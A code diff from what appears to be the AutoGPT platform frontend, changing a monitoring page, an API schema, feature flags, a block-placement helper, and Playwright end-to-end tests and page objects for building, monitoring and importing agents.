(selectedFlow && (
<FlowInfo
flow={selectedFlow}
executions={executions.filter(
(e) => e.graph_id == selectedFlow.graph_id,
)}
className={column3}
refresh={() => {
fetchAgents();
setSelectedFlow(null);
setSelectedRun(null);
}}
/>
)) || (
<Card className={`p-6 ${column3}`}>
<FlowRunsStatus flows={flows} executions={executions} />
</Card>
)}
<div className="col-span-full xl:col-span-6">
<SchedulesTable
schedules={schedules} // all schedules
agents={flows} // for filtering purpose
onRemoveSchedule={removeSchedule}
sortColumn={sortColumn}
sortDirection={sortDirection}
onSort={handleSort}
/>
</div>
</div>
);
};
export default Monitor;

View File

@@ -7022,29 +7022,24 @@
"input_schema": {
"additionalProperties": true,
"type": "object",
"title": "Input Schema"
"title": "Input Schema",
"description": "Full JSON schema for block inputs"
},
"output_schema": {
"additionalProperties": true,
"type": "object",
"title": "Output Schema"
"title": "Output Schema",
"description": "Full JSON schema for block outputs"
},
"required_inputs": {
"items": { "$ref": "#/components/schemas/BlockInputFieldInfo" },
"type": "array",
"title": "Required Inputs",
"description": "List of required input fields for this block"
"description": "List of input fields for this block"
}
},
"type": "object",
"required": [
"id",
"name",
"description",
"categories",
"input_schema",
"output_schema"
],
"required": ["id", "name", "description", "categories"],
"title": "BlockInfoSummary",
"description": "Summary of a block for search results."
},
@@ -7090,7 +7085,7 @@
"usage_hint": {
"type": "string",
"title": "Usage Hint",
"default": "To execute a block, call run_block with block_id set to the block's 'id' field and input_data containing the required fields from input_schema."
"default": "To execute a block, call run_block with block_id set to the block's 'id' field and input_data containing the fields listed in required_inputs."
}
},
"type": "object",

File diff suppressed because it is too large Load Diff

View File

@@ -12,6 +12,7 @@ export const PROTECTED_PAGES = [
"/onboarding",
"/profile",
"/library",
"/monitoring",
] as const;
export const ADMIN_PAGES = ["/admin"] as const;

View File

@@ -2,6 +2,7 @@ import { type ClassValue, clsx } from "clsx";
import _isEmpty from "lodash/isEmpty";
import { twMerge } from "tailwind-merge";
import { NodeDimension } from "@/app/(platform)/build/components/legacy-builder/Flow/Flow";
import {
BlockIOObjectSubSchema,
BlockIORootSchema,
@@ -331,6 +332,81 @@ export function getPrimaryCategoryColor(categories: Category[]): string {
);
}
function rectanglesOverlap(
rect1: { x: number; y: number; width: number; height?: number },
rect2: { x: number; y: number; width: number; height?: number },
): boolean {
const x1 = rect1.x,
y1 = rect1.y,
w1 = rect1.width,
h1 = rect1.height ?? 100;
const x2 = rect2.x,
y2 = rect2.y,
w2 = rect2.width,
h2 = rect2.height ?? 100;
// Check if the rectangles do not overlap
return !(x1 + w1 <= x2 || x1 >= x2 + w2 || y1 + h1 <= y2 || y1 >= y2 + h2);
}
export function findNewlyAddedBlockCoordinates(
nodeDimensions: NodeDimension,
newWidth: number,
margin: number,
zoom: number,
) {
const nodeDimensionArray = Object.values(nodeDimensions);
for (let i = nodeDimensionArray.length - 1; i >= 0; i--) {
const lastNode = nodeDimensionArray[i];
const lastNodeHeight = lastNode.height ?? 100;
// Right of the last node
let newX = lastNode.x + lastNode.width + margin;
let newY = lastNode.y;
let newRect = { x: newX, y: newY, width: newWidth, height: 100 / zoom };
const collisionRight = nodeDimensionArray.some((node) =>
rectanglesOverlap(newRect, node),
);
if (!collisionRight) {
return { x: newX, y: newY };
}
// Left of the last node
newX = lastNode.x - newWidth - margin;
newRect = { x: newX, y: newY, width: newWidth, height: 100 / zoom };
const collisionLeft = nodeDimensionArray.some((node) =>
rectanglesOverlap(newRect, node),
);
if (!collisionLeft) {
return { x: newX, y: newY };
}
// Below the last node
newX = lastNode.x;
newY = lastNode.y + lastNodeHeight + margin;
newRect = { x: newX, y: newY, width: newWidth, height: 100 / zoom };
const collisionBelow = nodeDimensionArray.some((node) =>
rectanglesOverlap(newRect, node),
);
if (!collisionBelow) {
return { x: newX, y: newY };
}
}
// Default position if no space is found
return {
x: 0,
y: 0,
};
}
export function hasNonNullNonObjectValue(obj: any): boolean {
if (obj !== null && typeof obj === "object") {
return Object.values(obj).some((value) => hasNonNullNonObjectValue(value));

View File

@@ -10,6 +10,8 @@ export enum Flag {
NEW_AGENT_RUNS = "new-agent-runs",
GRAPH_SEARCH = "graph-search",
ENABLE_ENHANCED_OUTPUT_HANDLING = "enable-enhanced-output-handling",
NEW_FLOW_EDITOR = "new-flow-editor",
BUILDER_VIEW_SWITCH = "builder-view-switch",
SHARE_EXECUTION_RESULTS = "share-execution-results",
AGENT_FAVORITING = "agent-favoriting",
MARKETPLACE_SEARCH_TERMS = "marketplace-search-terms",
@@ -25,6 +27,8 @@ const defaultFlags = {
[Flag.NEW_AGENT_RUNS]: false,
[Flag.GRAPH_SEARCH]: false,
[Flag.ENABLE_ENHANCED_OUTPUT_HANDLING]: false,
[Flag.NEW_FLOW_EDITOR]: false,
[Flag.BUILDER_VIEW_SWITCH]: false,
[Flag.SHARE_EXECUTION_RESULTS]: false,
[Flag.AGENT_FAVORITING]: false,
[Flag.MARKETPLACE_SEARCH_TERMS]: DEFAULT_SEARCH_TERMS,

View File

@@ -11,18 +11,24 @@ test.beforeEach(async ({ page }) => {
const buildPage = new BuildPage(page);
const testUser = await getTestUser();
const { getId } = getSelectors(page);
await page.goto("/login");
await loginPage.login(testUser.email, testUser.password);
await hasUrl(page, "/marketplace");
await page.goto("/build");
await buildPage.closeTutorial();
await buildPage.openBlocksPanel();
const [dictionaryBlock] = await buildPage.getFilteredBlocksFromAPI(
(block) => block.name === "AddToDictionaryBlock",
);
await buildPage.addBlock(dictionaryBlock);
const blockCard = getId(`block-name-${dictionaryBlock.id}`);
await blockCard.click();
const blockInEditor = getId(dictionaryBlock.id).first();
expect(blockInEditor).toBeAttached();
await buildPage.saveAgent("Test Agent", "Test Description");
await test

View File

@@ -1,6 +1,3 @@
// TODO: These tests were written for the old (legacy) builder.
// They need to be updated to work with the new flow editor.
// Note: all the comments with //(number)! are for the docs
//ignore them when reading the code, but if you change something,
//make sure to update the docs! Your autoformmater will break this page,
@@ -15,7 +12,7 @@ import { getTestUser } from "./utils/auth";
// Reason Ignore: admonishment is in the wrong place visually with correct prettier rules
// prettier-ignore
test.describe.skip("Build", () => { //(1)!
test.describe("Build", () => { //(1)!
let buildPage: BuildPage; //(2)!
// Reason Ignore: admonishment is in the wrong place visually with correct prettier rules

View File

@@ -0,0 +1,140 @@
import test, { expect, TestInfo } from "@playwright/test";
import { BuildPage } from "./pages/build.page";
import { MonitorPage } from "./pages/monitor.page";
import { v4 as uuidv4 } from "uuid";
import * as fs from "fs/promises";
import path from "path";
import { LoginPage } from "./pages/login.page";
import { getTestUser } from "./utils/auth";
import { hasUrl } from "./utils/assertion";
import {
navigateToLibrary,
clickFirstAgent,
runAgent,
waitForAgentPageLoad,
} from "./pages/library.page";
test.describe.configure({
mode: "parallel",
timeout: 30000,
});
// --8<-- [start:AttachAgentId]
test.beforeEach(async ({ page }, testInfo: TestInfo) => {
const loginPage = new LoginPage(page);
const testUser = await getTestUser();
const monitorPage = new MonitorPage(page);
// Start each test with login using worker auth
await page.goto("/login");
await loginPage.login(testUser.email, testUser.password);
await hasUrl(page, "/marketplace");
// Navigate to library and run the first agent
await navigateToLibrary(page);
await clickFirstAgent(page);
await waitForAgentPageLoad(page);
await runAgent(page);
// Navigate to monitoring page
await page.goto("/monitoring");
await test.expect(monitorPage.isLoaded()).resolves.toBeTruthy();
// Generate a test ID for tracking
const id = uuidv4();
testInfo.attach("agent-id", { body: id });
});
// --8<-- [end:AttachAgentId]
test.afterAll(async () => {
// clear out the downloads folder
const downloadsFolder = process.cwd() + "/downloads";
console.log(`clearing out the downloads folder ${downloadsFolder}/monitor`);
await fs.rm(`${downloadsFolder}/monitor`, {
recursive: true,
force: true,
});
});
test.skip("user can export and import agents", async ({
page,
}, testInfo: TestInfo) => {
const monitorPage = new MonitorPage(page);
const buildPage = new BuildPage(page);
// --8<-- [start:ReadAgentId]
if (testInfo.attachments.length === 0 || !testInfo.attachments[0].body) {
throw new Error("No agent id attached to the test");
}
const testAttachName = testInfo.attachments[0].body.toString();
// --8<-- [end:ReadAgentId]
const agents = await monitorPage.listAgents();
const downloadPromise = page.waitForEvent("download");
const agent = agents.find(
(a: any) => a.name === `test-agent-${testAttachName}`,
);
if (!agent) throw new Error(`Agent ${testAttachName} not found`);
await monitorPage.exportToFile(agent);
const download = await downloadPromise;
// Wait for the download process to complete and save the downloaded file somewhere.
await download.saveAs(
`${monitorPage.downloadsFolder}/monitor/${download.suggestedFilename()}`,
);
console.log(`downloaded file to ${download.suggestedFilename()}`);
expect(download.suggestedFilename()).toBeDefined();
expect(download.suggestedFilename()).toContain("test-agent-");
expect(download.suggestedFilename()).toContain("v1.json");
// import the agent
const preImportAgents = await monitorPage.listAgents();
const filesInFolder = await fs.readdir(
`${monitorPage.downloadsFolder}/monitor`,
);
const importFile = filesInFolder.find((f) => f.includes(testAttachName));
if (!importFile) {
throw new Error(`No import file found for agent ${testAttachName}`);
}
const baseName = importFile.split(".")[0];
await monitorPage.importFromFile(
path.resolve(monitorPage.downloadsFolder, "monitor"),
importFile,
baseName + "-imported",
);
// You'll be dropped at the build page, so hit run and then go back to monitor
await buildPage.runAgent();
await monitorPage.navbar.clickMonitorLink();
const postImportAgents = await monitorPage.listAgents();
expect(postImportAgents.length).toBeGreaterThan(preImportAgents.length);
console.log(`postImportAgents: ${JSON.stringify(postImportAgents)}`);
const importedAgent = postImportAgents.find(
(a: any) => a.name === `${baseName}-imported`,
);
expect(importedAgent).toBeDefined();
});
test.skip("user can view runs and agents", async ({ page }) => {
const monitorPage = new MonitorPage(page);
// const runs = await monitorPage.listRuns();
const agents = await monitorPage.listAgents();
expect(agents.length).toBeGreaterThan(0);
});

View File

@@ -1,6 +1,7 @@
import { Locator, Page } from "@playwright/test";
import { expect, Locator, Page } from "@playwright/test";
import { Block as APIBlock } from "../../lib/autogpt-server-api/types";
import { beautifyString } from "../../lib/utils";
import { isVisible } from "../utils/assertion";
import { BasePage } from "./base.page";
export interface Block {
@@ -26,39 +27,32 @@ export class BuildPage extends BasePage {
try {
await this.page
.getByRole("button", { name: "Skip Tutorial", exact: true })
.click({ timeout: 3000 });
} catch (_error) {
console.info("Tutorial not shown or already dismissed");
.click();
} catch (error) {
console.info("Error closing tutorial:", error);
}
}
async openBlocksPanel(): Promise<void> {
const popoverContent = this.page.locator(
'[data-id="blocks-control-popover-content"]',
);
const isPanelOpen = await popoverContent.isVisible();
const isPanelOpen = await this.page
.getByTestId("blocks-control-blocks-label")
.isVisible();
if (!isPanelOpen) {
await this.page.getByTestId("blocks-control-blocks-button").click();
await popoverContent.waitFor({ state: "visible", timeout: 5000 });
}
}
async closeBlocksPanel(): Promise<void> {
const popoverContent = this.page.locator(
'[data-id="blocks-control-popover-content"]',
);
if (await popoverContent.isVisible()) {
await this.page.getByTestId("blocks-control-blocks-button").click();
}
await this.page.getByTestId("profile-popout-menu-trigger").click();
}
async saveAgent(
name: string = "Test Agent",
description: string = "",
): Promise<void> {
console.log(`Saving agent '${name}' with description '${description}'`);
await this.page.getByTestId("save-control-save-button").click();
console.log(`💾 Saving agent '${name}' with description '${description}'`);
await this.page.getByTestId("blocks-control-save-button").click();
await this.page.getByTestId("save-control-name-input").fill(name);
await this.page
.getByTestId("save-control-description-input")
@@ -113,34 +107,32 @@ export class BuildPage extends BasePage {
await this.openBlocksPanel();
const searchInput = this.page.locator(
'[data-id="blocks-control-search-bar"] input[type="text"]',
'[data-id="blocks-control-search-input"]',
);
const displayName = this.getDisplayName(block.name);
await searchInput.clear();
await searchInput.fill(displayName);
const blockCardId = block.id.replace(/[^a-zA-Z0-9]/g, "");
const blockCard = this.page.locator(
`[data-id="block-card-${blockCardId}"]`,
);
const blockCard = this.page.getByTestId(`block-name-${block.id}`);
try {
// Wait for the block card to be visible with a reasonable timeout
await blockCard.waitFor({ state: "visible", timeout: 10000 });
await blockCard.click();
const blockInEditor = this.page.getByTestId(block.id).first();
expect(blockInEditor).toBeAttached();
} catch (error) {
console.log(
`Block ${block.name} (display: ${displayName}) returned from the API but not found in block list`,
`❌ ❌ Block ${block.name} (display: ${displayName}) returned from the API but not found in block list`,
);
console.log(`Error: ${error}`);
}
}
async hasBlock(_block: Block) {
// In the new flow editor, verify a node exists on the canvas
const node = this.page.locator('[data-id^="custom-node-"]').first();
await node.isVisible();
async hasBlock(block: Block) {
const blockInEditor = this.page.getByTestId(block.id).first();
await blockInEditor.isVisible();
}
async getBlockInputs(blockId: string): Promise<string[]> {
@@ -167,7 +159,7 @@ export class BuildPage extends BasePage {
// Clear any existing search to ensure we see all blocks in the category
const searchInput = this.page.locator(
'[data-id="blocks-control-search-bar"] input[type="text"]',
'[data-id="blocks-control-search-input"]',
);
await searchInput.clear();
@@ -399,13 +391,13 @@ export class BuildPage extends BasePage {
async isRunButtonEnabled(): Promise<boolean> {
console.log(`checking if run button is enabled`);
const runButton = this.page.locator('[data-id="run-graph-button"]');
const runButton = this.page.getByTestId("primary-action-run-agent");
return await runButton.isEnabled();
}
async runAgent(): Promise<void> {
console.log(`clicking run button`);
const runButton = this.page.locator('[data-id="run-graph-button"]');
const runButton = this.page.getByTestId("primary-action-run-agent");
await runButton.click();
await this.page.waitForTimeout(1000);
await runButton.click();
@@ -432,7 +424,7 @@ export class BuildPage extends BasePage {
async waitForSaveButton(): Promise<void> {
console.log(`waiting for save button`);
await this.page.waitForSelector(
'[data-testid="save-control-save-button"]:not([disabled])',
'[data-testid="blocks-control-save-button"]:not([disabled])',
);
}
@@ -534,22 +526,27 @@ export class BuildPage extends BasePage {
async createDummyAgent() {
await this.closeTutorial();
await this.openBlocksPanel();
const dictionaryBlock = await this.getDictionaryBlockDetails();
const searchInput = this.page.locator(
'[data-id="blocks-control-search-bar"] input[type="text"]',
'[data-id="blocks-control-search-input"]',
);
const displayName = this.getDisplayName(dictionaryBlock.name);
await searchInput.clear();
await searchInput.fill("Add to Dictionary");
const blockCard = this.page.locator('[data-id^="block-card-"]').first();
try {
await blockCard.waitFor({ state: "visible", timeout: 10000 });
await isVisible(this.page.getByText("Output"));
await searchInput.fill(displayName);
const blockCard = this.page.getByTestId(`block-name-${dictionaryBlock.id}`);
if (await blockCard.isVisible()) {
await blockCard.click();
} catch (error) {
console.log("Could not find Add to Dictionary block:", error);
const blockInEditor = this.page.getByTestId(dictionaryBlock.id).first();
expect(blockInEditor).toBeAttached();
}
await this.saveAgent("Test Agent", "Test Description");
await expect(this.isRunButtonEnabled()).resolves.toBeTruthy();
}
}

View File

@@ -252,6 +252,21 @@ export class LibraryPage extends BasePage {
]);
}
async clickMonitoringLink(): Promise<void> {
console.log(`clicking monitoring link in alert`);
await this.page.getByRole("link", { name: "here" }).click();
}
async isMonitoringAlertVisible(): Promise<boolean> {
console.log(`checking if monitoring alert is visible`);
try {
const alertText = this.page.locator("text=/Prefer the old experience/");
return await alertText.isVisible();
} catch {
return false;
}
}
async getSearchValue(): Promise<string> {
console.log(`getting search input value`);
try {

View File

@@ -0,0 +1,237 @@
import { Page } from "@playwright/test";
import { BasePage } from "./base.page";
import path from "path";
interface Agent {
id: string;
name: string;
runCount: number;
lastRun: string;
}
interface Run {
id: string;
agentId: string;
agentName: string;
started: string;
duration: number;
status: string;
}
interface Schedule {
id: string;
graphName: string;
nextExecution: string;
schedule: string;
actions: string[];
}
enum ImportType {
AGENT = "agent",
TEMPLATE = "template",
}
export class MonitorPage extends BasePage {
constructor(page: Page) {
super(page);
}
async isLoaded(): Promise<boolean> {
console.log(`checking if monitor page is loaded`);
try {
// Wait for the monitor page
await this.page.getByTestId("monitor-page").waitFor({
state: "visible",
timeout: 10_000,
});
// Wait for table headers to be visible (indicates table structure is ready)
await this.page.locator("thead th").first().waitFor({
state: "visible",
timeout: 15_000,
});
// Wait for either a table row or an empty tbody to be present
await Promise.race([
// Wait for at least one row
this.page.locator("tbody tr[data-testid]").first().waitFor({
state: "visible",
timeout: 15_000,
}),
// OR wait for an empty tbody (indicating no agents but table is loaded)
this.page
.locator("tbody[data-testid='agent-flow-list-body']:empty")
.waitFor({
state: "visible",
timeout: 15_000,
}),
]);
return true;
} catch {
return false;
}
}
async listAgents(): Promise<Agent[]> {
console.log(`listing agents`);
// Wait for table rows to be available
const rows = await this.page.locator("tbody tr[data-testid]").all();
const agents: Agent[] = [];
for (const row of rows) {
// Get the id from data-testid attribute
const id = (await row.getAttribute("data-testid")) || "";
// Get columns - there are 3 cells per row (name, run count, last run)
const cells = await row.locator("td").all();
// Extract name from first cell
const name = (await row.getAttribute("data-name")) || "";
// Extract run count from second cell
const runCountText = (await cells[1].textContent()) || "0";
const runCount = parseInt(runCountText, 10);
// Extract last run from third cell's title attribute (contains full timestamp)
// If no title, the cell will be empty indicating no last run
const lastRunCell = cells[2];
const lastRun = (await lastRunCell.getAttribute("title")) || "";
agents.push({
id,
name,
runCount,
lastRun,
});
}
agents.reduce((acc, agent) => {
if (!agent.id.includes("flow-run")) {
acc.push(agent);
}
return acc;
}, [] as Agent[]);
return agents;
}
async listRuns(filter?: Agent): Promise<Run[]> {
console.log(`listing runs`);
// Wait for the runs table to be loaded - look for table header "Agent"
await this.page.locator("[data-testid='flow-runs-list-body']").waitFor({
timeout: 10000,
});
// Get all run rows
const rows = await this.page
.locator('tbody tr[data-testid^="flow-run-"]')
.all();
const runs: Run[] = [];
for (const row of rows) {
const runId = (await row.getAttribute("data-runid")) || "";
const agentId = (await row.getAttribute("data-graphid")) || "";
// Get columns
const cells = await row.locator("td").all();
// Parse data from cells
const agentName = (await cells[0].textContent()) || "";
const started = (await cells[1].textContent()) || "";
const status = (await cells[2].locator("div").textContent()) || "";
const duration = (await cells[3].textContent()) || "";
// Only add if no filter or if matches filter
if (!filter || filter.id === agentId) {
runs.push({
id: runId,
agentId: agentId,
agentName: agentName.trim(),
started: started.trim(),
duration: parseFloat(duration.replace("s", "")),
status: status.toLowerCase().trim(),
});
}
}
return runs;
}
async listSchedules(): Promise<Schedule[]> {
console.log(`listing schedules`);
return [];
}
async clickAgent(id: string) {
console.log(`selecting agent ${id}`);
await this.page.getByTestId(id).click();
}
async clickCreateAgent(): Promise<void> {
console.log(`clicking create agent`);
await this.page.getByRole("link", { name: "Create" }).click();
}
async importFromFile(
directory: string,
file: string,
name?: string,
description?: string,
importType: ImportType = ImportType.AGENT,
) {
console.log(
`importing from directory: ${directory} file: ${file} name: ${name} description: ${description} importType: ${importType}`,
);
await this.page.getByTestId("create-agent-dropdown").click();
await this.page.getByTestId("import-agent-from-file").click();
await this.page
.getByTestId("import-agent-file-input")
.setInputFiles(path.join(directory, file));
if (name) {
console.log(`filling agent name: ${name}`);
await this.page.getByTestId("agent-name-input").fill(name);
}
if (description) {
console.log(`filling agent description: ${description}`);
await this.page.getByTestId("agent-description-input").fill(description);
}
if (importType === ImportType.TEMPLATE) {
console.log(`clicking import as template switch`);
await this.page.getByTestId("import-as-template-switch").click();
}
console.log(`clicking import agent submit`);
await this.page.getByTestId("import-agent-submit").click();
}
async deleteAgent(agent: Agent) {
console.log(`deleting agent ${agent.id} ${agent.name}`);
}
async clickAllVersions(agent: Agent) {
console.log(`clicking all versions for agent ${agent.id} ${agent.name}`);
}
async openInBuilder(agent: Agent) {
console.log(`opening agent ${agent.id} ${agent.name} in builder`);
}
async exportToFile(agent: Agent) {
await this.clickAgent(agent.id);
console.log(`exporting agent id: ${agent.id} name: ${agent.name} to file`);
await this.page.getByTestId("export-button").click();
}
async selectRun(agent: Agent, run: Run) {
console.log(`selecting run ${run.id} for agent ${agent.id} ${agent.name}`);
}
async openOutputs(agent: Agent, run: Run) {
console.log(
`opening outputs for run ${run.id} of agent ${agent.id} ${agent.name}`,
);
}
}

View File

@@ -8,6 +8,10 @@ export class NavBar {
await this.page.getByRole("link", { name: "Edit profile" }).click();
}
async clickMonitorLink() {
await this.page.getByTestId("navbar-link-library").click();
}
async clickBuildLink() {
const link = this.page.getByTestId("navbar-link-build");
await link.waitFor({ state: "visible", timeout: 15000 });